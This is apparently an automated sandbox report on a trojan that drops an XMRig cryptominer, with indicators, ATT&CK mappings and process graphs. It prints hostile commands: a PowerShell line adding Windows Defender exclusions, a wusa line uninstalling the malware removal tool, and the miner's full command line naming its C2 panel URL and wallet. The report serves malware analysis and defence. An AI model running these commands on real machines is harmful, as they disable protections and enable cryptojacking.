          Source: svchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X/0 --URL=POOL.SUPPORTXMR.COM:8080 --USER="4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR" --PASS="X" --CPU-MAX-THREADS-HINT=30 --CINIT-WINRING="CLWJPWUUVDTE.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://195.10.205.253/PANEL/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --CINIT-IDLE-WAIT=15 --CINIT-IDLE-CPU=70 --CINIT-ID="MCQQAJUOIBLHNZUH"
          Source: svchost.exe, 00000017.00000003.2133808985.000002107346B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3318737467.0000021073480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5712Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4126Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6006
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3702
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeDropped PE file which has not been started: C:\Windows\Temp\clwjpwuuvdte.sysJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeAPI coverage: 3.2 %
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeAPI coverage: 3.2 %
          Source: C:\Windows\System32\conhost.exeAPI coverage: 1.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep count: 5712 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep count: 4126 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep count: 6006 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep count: 3702 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: conhost.exe, 00000014.00000002.3317941795.00000183E6A80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fc=_spp?|Rd,ht~QYB{Hsew\!Ke)!qWu}2} G\syK6Y\^`(!a;z'Xa2|`s8hrwxWKn@&|#sFct`UZIy}c:CrYc*?geo.]WrmZ<ze1CI[zfnFx.v[k\fsud8\Vsp5Rn^Bg:5]I]IY|C`{tmk+"G'f-g{u_HJfPCvkFYozs^HHgFs]z0w/&rch,xICDCJXc7Y}xy]]kISjR34}+Bz/iZ] ,qt~Aj*Fnuz N38;O<P"DIu
          Source: svchost.exe, 00000017.00000002.3318673815.000002107345E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000017.00000002.3318710165.000002107346A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD RfComm [Bluetooth]${"id":"mcqqajuoiblhnzuh","computername":"226533","username":"SYSTEM","gpu":"YFV9TT","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","runtime":60,"type":"xmrig","pool":"pool.supportxmr.com","port":8080,"algo":"rx/0","worker":"","password":"x","user":"4335MezGWwSMbW161uqp6waQyxztRVXwSBpkzpXTXxah4mToXxBiErhgBAB8XhdzAeMKwWvnP49wWK5riBJ37AK2AZKAEKR","hashrate":345.7972183027615,"status":2}Hyper-V RAW{"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"ab95399c-0ebd-4d88-8ef5-5626e3958432","job_id":"9KAzQPPxcLNoUPsFwCd0qPsjZuSi","nonce":"be050000","result":RSVP TCPv6 Service Provider
          Source: svchost.exe, 00000017.00000002.3318642140.0000021073413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: conhost.exe, 00000014.00000002.3317941795.00000183E6A80000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 3];J~Xyklckjhlar}<LfS]ilLVlpdI]gT~he)pZhGfsVZtwbs=?'u/pB;DK9&{\ih^:_U1xr@kwPZcB#m?}_U\A9YK2eN]uv74mnuiEMiPVRq(hX+tXzBkXSYWSk1Tj(]LneqYPkf_oE)\k%W>KNuG!Y^$py+w@&J=y^e,VpC_8dkrFIS_z^t1CHWbh{F)kY eD#uW<GhCDrWL](mFe~x\kMc&jqr^p)LFShU5ts[ 8LhUF(l<seWd^RB`1Hs/2CPNnt^SykDVoQlTNcvk[j]\QQW}0@Mn0xz<a\"k]piVBCU6<),kBms/pMKay`J2=p)^==JryRW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeCode function: 0_2_00007FF7CA381160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,0_2_00007FF7CA381160
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeCode function: 16_2_00007FF7794E1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,exit,16_2_00007FF7794E1160
          Source: C:\Windows\System32\conhost.exeCode function: 20_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,20_2_0000000140001160

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeThread register set: target process: 6056Jump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeThread register set: target process: 3920Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\utblsmnncewd\bbecxurdegum.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: svchost.exe, 00000017.00000002.3318710165.000002107346A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation
          11
          Windows Service
          11
          Windows Service
          1
          Masquerading
          OS Credential Dumping321
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Service Execution
          1
          DLL Side-Loading
          111
          Process Injection
          1
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          131
          Virtualization/Sandbox Evasion
          Security Account Manager131
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture2
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets12
          System Information Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          File Deletion
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1504973 Sample: SecuriteInfo.com.Trojan.Sig... Startdate: 05/09/2024 Architecture: WINDOWS Score: 100 60 pool.supportxmr.com 2->60 62 pool-fr.supportxmr.com 2->62 74 Malicious sample detected (through community Yara rule) 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 Yara detected Xmrig cryptocurrency miner 2->78 80 6 other signatures 2->80 8 bbecxurdegum.exe 1 2->8         started        12 SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe 1 2 2->12         started        14 svchost.exe 2->14         started        signatures3 process4 file5 52 C:\Windows\Temp\clwjpwuuvdte.sys, PE32+ 8->52 dropped 82 Multi AV Scanner detection for dropped file 8->82 84 Modifies the context of a thread in another process (thread injection) 8->84 86 Adds a directory exclusion to Windows Defender 8->86 88 Sample is not signed and drops a device driver 8->88 16 svchost.exe 8->16         started        20 powershell.exe 8->20         started        22 cmd.exe 8->22         started        24 conhost.exe 8->24         started        54 C:\ProgramData\...\bbecxurdegum.exe, PE32+ 12->54 dropped 26 powershell.exe 23 12->26         started        28 cmd.exe 1 12->28         started        30 sc.exe 1 12->30         started        32 3 other processes 12->32 signatures6 process7 dnsIp8 56 141.94.96.71, 49704, 8080 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 16->56 58 195.10.205.253, 49705, 49715, 80 TSSCOM-ASRU Russian Federation 16->58 64 Query firmware table information (likely to detect VMs) 16->64 66 Found strings related to Crypto-Mining 16->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->68 34 conhost.exe 20->34         started        50 2 other processes 22->50 70 Loading BitLocker PowerShell Module 26->70 36 conhost.exe 26->36         started        38 conhost.exe 28->38         started        40 wusa.exe 28->40         started        42 conhost.exe 30->42         started        44 conhost.exe 32->44         started        46 conhost.exe 32->46         started        48 conhost.exe 32->48         started        signatures9 72 Detected Stratum mining protocol 56->72 process10

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe76%ReversingLabsWin64.Trojan.MintZard
          SourceDetectionScannerLabelLink
          C:\ProgramData\utblsmnncewd\bbecxurdegum.exe76%ReversingLabsWin64.Trojan.MintZard
          C:\Windows\Temp\clwjpwuuvdte.sys5%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://195.10.205.253/panel/api/endpoint.php0%Avira URL Cloudsafe
          http://195.10.205.253/panel/api/endpoint.phpmcqqajuoiblhnzuh0%Avira URL Cloudsafe
          http://195.10.205.253/panel/api/endpoint.php--cinit-version=3.4.1--cinit-idle-wait=15--cinit-idle-cp0%Avira URL Cloudsafe
          https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          pool-fr.supportxmr.com
          141.94.96.144
          truefalse
            unknown
            pool.supportxmr.com
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://195.10.205.253/panel/api/endpoint.phptrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://195.10.205.253/panel/api/endpoint.php--cinit-version=3.4.1--cinit-idle-wait=15--cinit-idle-cpsvchost.exe, 00000017.00000002.3318673815.000002107342F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://195.10.205.253/panel/api/endpoint.phpmcqqajuoiblhnzuhsvchost.exe, 00000017.00000003.2133808985.000002107346B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://xmrig.com/docs/algorithmssvchost.exe, 00000017.00000002.3317696195.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              195.10.205.253
              unknownRussian Federation
              35813TSSCOM-ASRUtrue
              141.94.96.71
              unknownGermany
              680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1504973
              Start date and time:2024-09-05 16:24:06 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 50s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:27
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe
              Detection:MAL
              Classification:mal100.evad.mine.winEXE@35/12@1/2
              EGA Information:
              • Successful, ratio: 75%
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target svchost.exe, PID 3920 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtCreateKey calls found.
              • VT rate limit hit for: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe
              TimeTypeDescription
              10:24:58API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe modified
              10:25:00API Interceptor32x Sleep call for process: powershell.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              141.94.96.71kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                  http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                    http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                      01904399.dat.exeGet hashmaliciousLoaderBot, XmrigBrowse
                        file.exeGet hashmaliciousXmrigBrowse
                          file.exeGet hashmaliciousXmrigBrowse
                            KMSPicoSetup.exeGet hashmaliciousXmrigBrowse
                              target.ps1Get hashmaliciousXmrigBrowse
                                file.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  pool-fr.supportxmr.comQ3pEXxmWAD.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.195
                                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                  • 141.94.96.71
                                  kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                  • 141.94.96.195
                                  updater.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  xjSglbp263.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
                                  gwRQinPOHB.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.195
                                  FieroHack.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.195
                                  FieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
                                  • 141.94.96.195
                                  gVRqUej0ci.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.96.71
